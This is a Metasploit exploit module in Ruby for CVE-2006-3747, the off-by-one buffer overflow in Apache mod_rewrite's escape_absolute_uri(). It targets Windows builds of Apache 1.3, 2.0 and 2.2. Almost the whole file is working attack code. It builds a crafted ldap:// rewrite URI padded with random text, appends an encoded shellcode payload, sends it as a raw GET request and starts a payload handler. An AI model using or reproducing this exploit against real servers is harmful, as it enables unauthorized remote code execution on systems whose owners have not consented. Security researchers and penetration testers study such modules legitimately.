apache-mod-rewrite.rb.txt

`require 'msf/core'  
  
module Msf  
  
class Exploits::Windows::Http::Apache_mod_rewrite < Msf::Exploit::Remote  
  
include Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'Apache Mod_Rewrite escape_absolute_uri() Off-By-One Buffer Overflow',  
'Description' => %q{  
This module exploits a off-by-one buffer overflow. RewriteRule must be enabled and rule must meets this criteria:  
* beginning of the rewritten URL is controlled.  
* flags on the rule do not include the Forbidden (F), Gone (G), or NoEscape (NE) flag  
},  
'Author' => [ 'Marcin Kozlowski' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 0001 $',  
'References' =>  
[  
['CVE', '2006-3747'],  
['BID', '19204'],  
['OSVDB', '27588'],  
  
],  
'Privileged' => false,  
'Payload' =>  
{  
'BadChars' => "\x00",  
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,  
'DisableNops' => true,  
},  
'Platform' => 'win',  
'Targets' =>   
[  
['Apache 1.3 branch (>1.3.28 and <1.3.37), Apache 2.0 branch (2.0.46 and <2.0.59), Apache 2.2 branch (>2.2.0 and <2.2.3)', {'Ret' => 0x90909090 }], # our ret is NOP, since our shellcode is shortly after and will be execute next   
],  
'DisclosureDate' => 'Aug 28 2006'))  
  
register_options(  
[  
OptString.new('REWRITEPATH', [true, "Rewrite path"]),  
Opt::RPORT(80)   
], self.class )  
end  
  
def exploit  
connect  
  
rewritepath = datastore['REWRITEPATH']  
  
  
uri = "/#{rewritepath}/ldap://"+rand_text_alphanumeric(rand(16))+"/"+rand_text_alphanumeric(rand(32))+"%3f"+rand_text_alphanumeric(rand(8))+"%3f"+rand_text_alphanumeric(rand(8))+"%3f"+rand_text_alphanumeric(rand(16))+"%3f"+rand_text_alphanumeric(rand(8))+"%3f%90"   
uri += payload.encoded  
  
  
res = "GET #{uri} HTTP/1.0\r\n\r\n"  
print_status("Trying ...")  
sock.put(res)  
sock.close  
  
handler  
disconnect  
end  
  
  
  
end  
end   
`